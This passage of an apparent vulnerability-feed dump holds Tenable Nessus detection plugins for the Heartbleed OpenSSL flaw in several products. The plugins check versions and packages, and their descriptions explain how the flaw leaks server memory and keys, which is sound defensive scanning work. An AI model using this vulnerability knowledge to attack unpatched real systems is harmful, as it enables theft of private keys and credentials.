value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:blackberry:blackberry_enterprise_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"blackberry_es_installed.nasl\");\n script_require_keys(\"BlackBerry_ES/Product\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"BlackBerry_ES/Product\");\nversion = get_kb_item_or_exit(\"BlackBerry_ES/Version\");\npath = get_kb_item_or_exit(\"BlackBerry_ES/Path\");\n\napp_name = \"BlackBerry Enterprise Service\";\n\nif (\"BlackBerry Enterprise Service\" >!< product) audit(AUDIT_NOT_INST, app_name);\n\nif (version !~ \"^10\\.[12]\\.\") audit(AUDIT_NOT_INST, app_name+\" 10.x\");\n\n# Now, go check fileversion of tcnative-1.dll for UDS.\n# Note that, other tcnative-1.dll files may exist on\n# the server, this check is for the instance related\n# to UDS.\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nregistry_init();\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n}\n\ninfo = \"\";\ndll = \"\\RIM.BUDS.BWCN\\bin\\tcnative-1.dll\";\ntemp_path = path + dll;\ndll_ver = hotfix_get_fversion(path:temp_path);\nerr_res = hotfix_handle_error(\n error_code : dll_ver['error'],\n file : temp_path,\n appname : app_name,\n exit_on_fail : TRUE\n);\nhotfix_check_fversion_end();\n\ndll_version = join(dll_ver['value'], sep:\".\");\n\n# TC-Native begins using OpenSSL 1.0.1 branch (vuln) at version 1.1.24.0\n# TC-Native begins using OpenSSL 1.0.1g (patched) at version 1.1.30.0\nif (\n ver_compare(ver:dll_version, fix:'1.1.24.0', strict:FALSE) >= 0 &&\n ver_compare(ver:dll_version, fix:'1.1.30.0', strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + product +\n '\\n Path : ' + temp_path +\n '\\n Installed version : ' + dll_version +\n '\\n Fixed version : 1.1.30.0' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:40:45", "bulletinFamily": "scanner", "description": "The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the ", "modified": "2019-12-02T00:00:00", "id": "ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/73965", "published": "2014-05-12T00:00:00", "title": "Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73965);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2288.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection for Secure IT Windows Client 7.2 SP3 Update 1\n(version 7.2.3.222) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection_for_secure_it_client\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection for Secure IT Windows Client';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\nforeach key (display_names)\n if (\"Attachmate Reflection for Secure IT Client\" >< key) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\"Attachmate Reflection for Secure IT Client\" >!< display_name) continue;\n key -= '/DisplayName';\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\n# If not in paranoid mode, and no version available\n# from the registry or version is not 7.0.x - 7.2.x,\n# then exit.\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n (\n isnull(display_version) ||\n display_version !~ \"^7\\.[012]($|[^0-9])\"\n )\n && report_paranoia < 2\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n\n if (isnull(display_version)) audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"7.0.x through 7.2.x\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nRegCloseKey(handle:hklm);\nif (isnull(install_location))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\npath = item[1];\n\nif (isnull(path))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\nclose_registry(close:FALSE);\n\nexe = path + \"openssl.dll\";\n\nver = hotfix_get_fversion(path:exe);\nerr_res = hotfix_handle_error(\n error_code : ver['error'],\n file : exe,\n appname : appname,\n exit_on_fail : TRUE\n);\nhotfix_check_fversion_end();\n\nversion = join(ver['value'], sep:\".\");\n\n# Vendor patch contains Openssl.dll version 14.1.411.0\nif (ver_compare(ver:version, fix:\"14.1.411.0\", strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n File : ' + exe +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.1.411.0' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:37:51", "bulletinFamily": "scanner", "description": "The version of OpenSSL running on the remote host is affected by an\ninformation disclosure vulnerability.\n\nOpenSSL incorrectly handles memory in the TLS heartbeat extension,\npotentially allowing a remote attacker to read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.", "modified": "2019-12-02T00:00:00", "id": "AIX_OPENSSL_ADVISORY7.NASL", "href": "https://www.tenable.com/plugins/nessus/73472", "published": "2014-04-11T00:00:00", "title": "AIX OpenSSL Advisory : openssl_advisory7.doc (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory openssl_advisory7.doc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73472);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/17 12:00:06\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n\n script_name(english:\"AIX OpenSSL Advisory : openssl_advisory7.doc (Heartbleed)\");\n script_summary(english:\"Checks the version of the openssl packages and for iFix 0160_ifix\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote AIX host is running a vulnerable version of OpenSSL.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of OpenSSL running on the remote host is affected by an\ninformation disclosure vulnerability.\n\nOpenSSL incorrectly handles memory in the TLS heartbeat extension,\npotentially allowing a remote attacker to read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install the appropriate interim fix. Additionally, to address this\nissue you must :\n\n - Replace your SSL certificates by revoking existing certificates\n and reissuing new certificates, with a new private key generated\n by 'openssl genrsa'.\n\n - Reset User Credentials\n Force users to reset their passwords and revoke any existing\n cookies or authentication prior to the re-authentication.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/11\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\n{\n if (aix_check_ifix(release:\"5.3\", patch:\"0160_ifix\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.501\") < 0) flag++;\n if (aix_check_ifix(release:\"6.1\", patch:\"0160_ifix\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.501\") < 0) flag++;\n if (aix_check_ifix(release:\"7.1\", patch:\"0160_ifix\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.501\") < 0) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:25:56", "bulletinFamily": "scanner", "description": "According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-12-02T00:00:00", "id": "FILEZILLA_SERVER_0944.NASL", "href": "https://www.tenable.com/plugins/nessus/73640", "published": "2014-04-21T00:00:00", "title": "FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73640);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the banner version of FileZilla Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filezilla-project.org/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FileZilla Server version 0.9.44 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:filezilla:filezilla_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_keys(\"ftp/filezilla\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nexit(0, \"Temporarily deprecated.\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\nif (!banner) audit(AUDIT_WEB_BANNER_NOT, port);\nif (\"FileZilla Server\" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, \"FileZilla Server\");\n\nbanner = strstr(banner, \"FileZilla Server\");\nbanner = banner - strstr(banner, '\\r\\n');\n\nversion = eregmatch(pattern:\"FileZilla Server version (\\d\\.\\d\\.(\\d\\d[a-e]|\\d\\d|\\d[a-e]|\\d))\",string:banner);\n\nif(isnull(version)) audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"FileZilla Server\", port);\n\nif (\n version[1] =~ \"^0\\.[0-8]($|[^0-9])\" ||\n version[1] =~ \"^0\\.9\\.([0-9]|[1-3][0-9]|4[0-3])($|[^0-9])\"\n)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Application : FileZilla Server' +\n '\\n Version : ' + version[1] +\n '\\n Fixed : 0.9.44' +\n '\\n Banner : ' + banner +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"FileZilla Server\", version[1]);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:41:20", "bulletinFamily": "scanner", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "modified": "2019-12-02T00:00:00", "id": "CENTOS_RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73387", "published": "2014-04-08T00:00:00", "title": "CentOS 6 : openssl (CESA-2014:0376)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# CentOS Errata and Security Advisory 2014:0376 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73387);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/14 00:01:14 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"CentOS 6 : openssl (CESA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f645c53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n \n # Remote package installed : openssl-1.0.1e-16.el6_5.4\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:26:39", "bulletinFamily": "scanner", "description": "The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information disclosure,\ncommonly known as the ", "modified": "2019-12-02T00:00:00", "id": "FORTINET_FG-IR-14-011.NASL", "href": "https://www.tenable.com/plugins/nessus/73669", "published": "2014-04-11T00:00:00", "title": "Fortinet OpenSSL Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73669);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Fortinet OpenSSL Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks version of Fortinet device.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information disclosure,\ncommonly known as the 'Heartbleed' bug. A remote, unauthenticated,\nattacker could potentially exploit this vulnerability to extract up to\n64 kilobytes of memory per request from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-14-011\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a firmware version containing a fix for this\nvulnerability as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 